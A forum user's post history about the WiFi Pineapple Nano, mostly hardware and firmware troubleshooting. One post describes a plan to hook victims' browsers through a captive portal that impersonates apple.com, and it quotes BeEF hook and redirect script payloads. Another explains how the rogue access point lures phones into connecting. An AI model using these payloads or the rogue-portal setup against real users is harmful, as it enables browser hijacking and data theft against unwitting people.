Jump to content

lild4d

Active Members
  • Posts

    37
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by lild4d

  1. On 5/4/2017 at 6:14 PM, Sebkinne said:

    Hi @RazerBlade,

    I'm sorry you are not satisfied with the WiFi Pineapple.

    I haven't been able to spend a lot of time on the WiFi Pineapple lately, because I was focusing on other Hak5 products. That's why you haven't seen any firmware or system module updates.

    In terms of bugs, I am aware that some exist, but you should know that only a small subset of our users experience them, which make them hard to track down. Once I pick up the WiFi Pineapple again, I'm going to go over every Module (maybe one a week) and rid it of bugs and usability issues. I'll also be launching RCs to ensure that the shipped firmware upgrades are solid and "bug free(tm)".

    For now though, I'm truly sorry you are unhappy with the current state of the WiFi Pineapple. I hope that over the next few weeks and months we can remedy this.

    Can you give us a status update it's been a month and a half since that post pretty much and no news.

    Thanks

    • Upvote 1
  2. On 5/4/2017 at 6:14 PM, Sebkinne said:

    Hi @RazerBlade,

    I'm sorry you are not satisfied with the WiFi Pineapple.

    I haven't been able to spend a lot of time on the WiFi Pineapple lately, because I was focusing on other Hak5 products. That's why you haven't seen any firmware or system module updates.

    In terms of bugs, I am aware that some exist, but you should know that only a small subset of our users experience them, which make them hard to track down. Once I pick up the WiFi Pineapple again, I'm going to go over every Module (maybe one a week) and rid it of bugs and usability issues. I'll also be launching RCs to ensure that the shipped firmware upgrades are solid and "bug free(tm)".

    For now though, I'm truly sorry you are unhappy with the current state of the WiFi Pineapple. I hope that over the next few weeks and months we can remedy this.

    I love the products and I'm sure alot of them were sold so maybe it's time to hire another developer to help you out. Yea my nano  is also almost useless right now as well and I have the same issues :( you guys need to hire someone to work on each project not ditch the Main one (pineapple)that got you big because the rubber ducky got shown on Mr robot. I understand you want to Switch to rubber ducky while everyone's still talking about It but with as many people who bought this you need to hire some more people. 

    • Upvote 2
  3. My nano no longer installs or updates modules. The folder in /dev/root or rootfs is full so idk if that makes a difference. I want to just wipe it clean now and wipe onboard files and start all over. How do I do this?

    Also how do we connect to captive portals? because there is a million xfinity hotspots everywhere but it wont let me enter credentials to login to provide wifi dor wlan2. Can this be added to the networking section??

  4. Right now the easiest way...Connect using your phone and screenshot them so you can look back on it or copy and paste the recon scan into textedit,leafpad w/e. They need to implement a notes box on each module to save notes or reminders etc..

  5. A few places to check out..

    So I assume you updated the firmware on it to 1.0.5 . After you get a client connected( I dont mean the computer or phone your using to connect to the ap)

    go down to module manager and click "Manage Modules"and then click "Get Modules from WiFiPineapple.com and it should refresh the page and display almost 15 or so modules that are available. If your on PC click install all the way to the right on each module and it will ask you to install to "SD card"(Thats what its for since the Nano doesnt have much space. Extend the storage and add up to 64gb?? storage to the pineapple nano) Or Install Internal. I would select SD and if you dont have one go buy one online or at store ASAP because you will need it after installing updates,packages, and modules the nano will get full quick. If your on a phone you might not see "Install" so move the scroll bar to the right to see the button. The modules have a description on them so if you dont know how to use them use the links above or go to the Nano/Tetra Modules Section or Search for youtube videos and you can learn everything you need to know to get going. The SD card can also be used to store Reports/Logs/Settings?/Opkg packages or whatever you want. Buy one!

  6. If you click all the boxes and run the pineAP im pretty sure if they have wifi turned on but not connected still because of the beacon responses going out and coming in there phone will connect to you still even if there AP from home is 1000miles away. Unless they have it set to not save Wifi logins then it wont auto connect to your nano.

  7. From your field kit: ALFA AWUS036NEH USB WiFi Radio

    I got it to work after a few attempts. There are some weird conditions where it's causing trouble. I think it is when the USB is connected at boot time.

    I also experienced a situation where the scan for client-mode networks contained "False" which is pretty weird. That solved itself when I rebooted with the USB and then connected it.

    I'll try to reproduce this with exact set of conditions and report it. It's working, that's the main point.

    Mines the same if i connect them both and start up nano I cant connect to management ap it says wrong pass but if i remove the usb wifi the pass works fine.

  8. Topic:

    Setting up SD card as root to install more pkgs with opkg

    Post:

    I want to install and run a beef server on the nano amd one of the dependencies is ruby and there's no room on the nano at all really and it always installs the packages in opkg in the default root folder and even if I download to the SD card it still needs to be installed to the root because that's where openwrt os files are. I've tried opkg --dest and -o which is root-offline-install but I keep getting an error in both can't find dest "/sd/opkg" or whatever folder I choose on SD card.

    I want to be able to install more then a few packages from opkg so I image I'll need the space regardless. I'm sure I can run a beef server on my kali distro and share the connection from there to nano and then just load the Portal to connect to my beef hook address or just include "hook.js" in the code on no dog splash page and load there.

    Example:

    I got this from another site it just shows using karnasploit like the nano basically but not as easy and forwarding apple.com to your ip at the beef server and but looking like Apple.com on the captive portal and then loading payloads and the beef hook. Thing is beef server is ran on the laptop not the nano amd I want this to be able to run on its own without bringing the laptop if possible. I just don't know how slow beef and ruby would slow it down and keep cpu usage high. It might have to be ran from kali in background unless the beef hook can be hooked anywhere ane then Connect to beef control panel on my phone and load the JS payloads. If this has been tried before and it won't work for some reason enlightenment me please if it hasn't been and you have more info let me know. I'm trying to see how it can be a module somehow only thing is the control panel for beef and ruby and no api still so I'm jusy trying to figure it out on my own. This article shows a few ways of using the captive portal if anyone else with api already and more experience wants to take a look at it.

    <script type=text/javascript>window.location = http://www.apple.com:8080/YOURPIX.jpg</script><!Arbitrary Redirect >

    <script type=text/javascript>window.open(http://www.apple.com:8080/YOURPIX.jpg)</script><! Arbitrary Redirect >

    <script type=text/javascript src=http://www.apple.com:3000/hook.js></script><!Standard BeEF Hook >

    https://www.securestate.com/blog/2011/10/07/apple-os-x-lion-captive-portal-hijacking-attack

  9. Client mode with most common adapters is fixed in 1.0.2.

    The issue you're having with the ALFA at bootup has to do with the timing of device enumeration -- which is also fixed in the next firmware.

    Power wise 1.5 amps is sufficient. Heat wise it's rated to 110 C / 230 F -- so while it'll feel warm it's within tolerances.

    Just as soon we we get both NANO and TETRA out of dev phases with official launch we'll have adapters and other various accessories available al la carte,

    Ok so it wasn't as hot as I thought I noticed I had it in a bad spot on top of the laptop and I guess where alot of heat was generating. I moved it over and cooled down. I guess if it did become an issue later on I could get a small southbridge heatsink or those ones that look like bandaids that stick on. Just for fun darren have you tried connecting 2 nanos into each other and making a dual core 800mhz!? Idk if they would run together but it would be like a mini tetra and 4 radios to do whatever you wanted.

  10. Darren had said there were no drivers for the Alfa yet. I can't get my Alfa to pickup client mode. It shows up as wlan2, but when I try to connect it to Internet with client mode, it fails and defaults back to wlan1 and no connection is made. Tried it multiple times.

    EDIT: scratch that. When you conned wlan2 to Internet via client mode, it doesn't tell you you're connected, it just resets. But I see I have an ip and verified I have internet for connected clients. All is well :)

    I was confused to because it doesnt say your connected using wlan2 is just shows the menu to select wifi and enter password but once you check the network tab its there. Mines a little buggy Ive noticed to when I plug it into the nano and start it up sometimes the light on nano goes a really faint green(im guessing cuz of the green light inside peeking thru) and the client ap and management are up but I cant connect to them keeps asking for password when its the right one and the alfa usb dongle is lit up and led on but wlan2 isnt showing up. If I remove the usb dongle and power it on and off again it lights up blue and I can connect to both Ap's no issues. Almost like its not enough power to handle both devices. If I unplug nano from pc and power it back up and wait until the blue light stops flashing and is constant and then plug in alfa usb they both stay working fine and it recognizes wlan2 .

    I have both usb plugs connected to my laptop with the ac adapter plugged in. I tried plugging one into a ipad charger and another into my pc and then they all light up as well no plugging in alfa later. They are all USB 3.0 ports on my pc so I have no idea it didnt do this until adding the alfa NEH dongle. The belkin AC usb adapter works fine with it but its not supported on the nano yet so it just stays lit and flashing and doesnt do anything and thats only after installing the drivers for linux for it.

    It works but its definitely tricky. Maybe when new firmware comes out it will fix this issue and fully support it. Could only be me idk but Im probobly going to use my wall adapter that has 2 ipad/tablet ports (newer 2.4amp output and old usb is 1.5amp output) and use that to power it from now on since theres no swapping out needed. I dont use ICS anyways it wont use my connection for some reason so no point it even being connected to the laptop then.

  11. Can you capture a client of yours (phone or something) with the Nano and verify that associated clients have internet too? If it does, maybe I didn't initially because a tethered phone uses the usb0 interface and the alpha registers as wlan2.

    Not that it will matter after the update; it's more to satiate my curiosity.

    Yes it works I tried it on an android and iphone the "FreeWifi" Ap has internet connection. So I have wlan0,wlan1,wlan2 now

  12. I didn't try this yet because I was able to connect using wlan2 in client mode using the Alfa usb AWUS036NEH to a wifi connection and it gives the nano Internet connection now. Is the pine management in browser the only way to connect to wifi? I might make a script that uses wlan2 and looks for certain open hotspots like xfinity or other fast open ones and automatically Connect and if it doesn't find it keeps searching.

  13. If I plug a USB drive into is it going to auto mount itself and be used as storage on the nano? If it can and doesn't auto mount do I just go into the system conf file and edit that to mount it automatically? I seen it say /dev9 or whatever number mount and then unable to in the system log so idk if in doing it wrong or its not possible. The sdcard is plenty of space especially since modules aren't very big files but it would be nice to know still for running big files or I would have to look at how openwrt works but maybe like a live boot type deal on the nano for temporarily running a different Or kali command line version live boot.

  14. I was able to have the Nano Connected after changing the GW on WLAN0 to 192.168.1.254 and also be able to use the internet as well and Connect to AP management site. Still no internet connection for clients connected to my AP. Heres what I see

    #Destination #Gateway #Genmask #Flags #metric #Ref #Iface

    0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 wlan0

    172.16.42.0 0.0.0.0 255.255.255.0 U 0 0 0 enx00c0ca8d7bed

    192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0

    now after setting the gateway on wlan0 like you said its all good but connection still isnt shared to the main wifi .

    I could have my settings wrong and the bulletin on the main page that says check for news never loads.

    Im using kali 2.0 and I always get weird long names for ethernet and wireless adapters not just wlan1 and eth1

    Also when SSH into the nano im unable to get updates keeps saying no connection or Reset by peer so I cant update opkg in order to add my USB wireless adapter to the nano because right now it wont recognize it at all.

×
×
  • Create New...